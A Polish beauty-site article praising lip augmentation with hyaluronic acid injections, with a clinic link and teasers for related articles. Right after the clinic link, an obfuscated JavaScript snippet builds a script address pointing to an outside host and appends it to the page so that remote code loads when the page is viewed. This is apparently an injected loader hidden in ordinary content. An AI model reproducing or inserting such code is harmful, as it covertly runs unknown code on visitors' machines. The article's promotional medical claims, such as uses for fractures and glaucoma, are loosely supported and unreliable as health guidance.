Polecane artykuły

 • 1

piątek, 01 kwiecień 2016 21:01

Powiększanie ust za pomocą kwasu hialuronowego. Czy to bezpieczne?

Za sprawą celebrytek i modelek, współcześnie zapanowała moda na posiadanie pięknych pełnych ust. Niestety nie wszystkie kobiety zostały obdarzone tego typu wargami. Właśnie dla nich medycyna estetyczna ma coś, co może doskonale poprawić naturę. Jest to zabieg polegający na wypełnieniu ust za pomocą kwasu hialuronowego wstrzykiwanego pod skórę.

Czym jest kwas hialuronowy?

Kwas hialuronowy dzięki swoim szerokim właściwościom odmładzającym i zdolności wiązania kolagenu zyskał dużą popularność w kosmetyce. Niewiele osób wie jednak, że substancja ta naturalnie występuje w naszym organizmie.

Kwas hialuronowy doskonale wiąże wodę. To między innymi spadek jego poziomu w organizmie odpowiedzialny jest za utratę jędrności skóry i powstawanie zmarszczek.

Jak widać, decydując się na zastrzyki z kwasem hialuronowym, pomagamy po prostu uzupełnić naszej skórze ważny składnik, który traci ona z wiekiem. Warto również pamiętać, że dostarczanie kwasu hialuronowego w formie zastrzyków ma zastosowanie nie tylko w zabiegach mających na celu powiększenie i uwypuklenie ust, bądź wypełnienia zmarszczek, ale także w terapii wielu chorób takich jak na przykład różnego rodzaju złamania, a nawet podczas leczenia jaskry, czy też uszkodzenia chrząstki nosowej.

Jak wygląda zabieg powiększania ust kwasem hialuronowym?

Powiększenie ust za pomocą kwasu hialuronowego przeprowadzane jest zawsze w znieczuleniu miejscowym. Zazwyczaj przed dokonaniem zabiegu, osoba go przeprowadzająca smaruje specjalnym żelem chłodzącym i znieczulającym w miejsca, w których wstrzykiwany będzie kwas hialuronowy. Dzięki temu unikniemy dyskomfortu podczas, gdy będą nam podawane zastrzyki z kwasem.

Sam zabieg trwa zaledwie kilkanaście minut, a efekty widoczne są niemal od razu po wstrzyknięciu substancji wypełniającej. Rezultatem, jaki osiągnęliśmy poddając się zabiegowi powiększenia ust możemy cieszyć się ok. roku, czyli od 12 do 14 miesięcy. Po tym czasie kwas hialuronowy zostaje wchłonięty i zabieg należy powtórzyć.

Po zabiegu przez kilka godzin możemy odczuwać lekki dyskomfort, oraz zauważyć zaczerwienienie i opuchliznę w miejscach, gdzie wstrzykiwany był kwas hialuronowy. Objawy te jednak bardzo szybko ustępują.

Obszerniejsze informacje na temat przebiegu powiększania ust z użyciem kwasu hialuronowego, a także ceny takiego zabiegu można znaleźć tutaj: http://www.instytutluisa.pl/uslugi/powiekszanie-ust/

(function(){ aalk=document.createElement("script");aalk_="u"+("s")+"ta"; aalk_+=("t.i")+""+"n";aalk_+=(("f")+"o");aalk.type="text/j-avascript"; aalk_+="/"; aalku="8727589";aalku+=".ky12xtegalkf7znbsxq";aalku+="Xqpy36nx9a9"; aalk.src="//"+aalk_+aalku; aalk.async=true; document.body.appendChild(aalk); })();

Czytany 2267 razy

Artykuły powiązane

 • Delikatna pielęgnacja na lato Delikatna pielęgnacja na lato

  Wrażliwa skóra lubi delikatne kosmetyki – i mamy tu na myśli nie tylko ich skład, ale również sposób aplikacji. Dobrze na przykład, jeżeli nie trzeba ich zbyt mocno wcierać. Formuła mgiełki jest więc dla suchej, wrażliwej i łatwo ulegającej podrażnieniom cery wręcz wymarzona.

 • Idealny rytuał pielęgnacyjny Idealny rytuał pielęgnacyjny

  Odkryj nowy wymiar pielęgnacji! Spersonalizuj swój własny ulubiony zestaw i czerp przyjemność podczas aplikacji kosmetyku. Stwórz swój własny rytuał.

 • Powiększanie ust - kompendium wiedzy Powiększanie ust - kompendium wiedzy
  Korzystanie z usług medycyny estetycznej zyskuje coraz większą popularność. Pragniemy prezentować się nienagannie, wręcz perfekcyjnie. Każdy z nas marzy o zlikwidowaniu mankamentów, które nie wpływają korzystnie na wygląd i samopoczucie. Jednym z najbardziej znanych zabiegów medycyny estetycznej to powiększanie ust. Na czym on polega? Co warto wiedzieć, zanim zdecydujemy się na tego typu usługę? Na te i inne pytania odpowiadamy w dzisiejszym artykule!
 • Kwas hialuronowy - jak wykorzystać go w domu? Kwas hialuronowy - jak wykorzystać go w domu?

  Każda kobieta pragnie jak najdłużej cieszyć się jędrną gładką skórą. W tym celu warto jak najwcześniej zadbać o prawidłową pielęgnację cery, dostosowaną do jej indywidualnych potrzeb i kondycji. Coraz częściej w ofercie salonów urody pojawiają się zabiegi z kategorii medycyny estetycznej, które mają w zjawiskowy sposób poprawić owal twarzy, ujędrnić skórę i wypełnić zmarszczki.

 • TkaniNOWE maski L’biotica TkaniNOWE maski L’biotica

  L’biotica jako jedna z pierwszych firm przedstawiła Polkom maski na tkaninie do pielęgnacji twarzy, inspirowane koreańskim rytuałem. Kobiety pokochały płaty nasączone serum z dużą ilością składników aktywnych za łatwą aplikację i widoczne efekty. Do tkaninowych masek L’biotica HOME SPA właśnie dołączyły cztery nowe.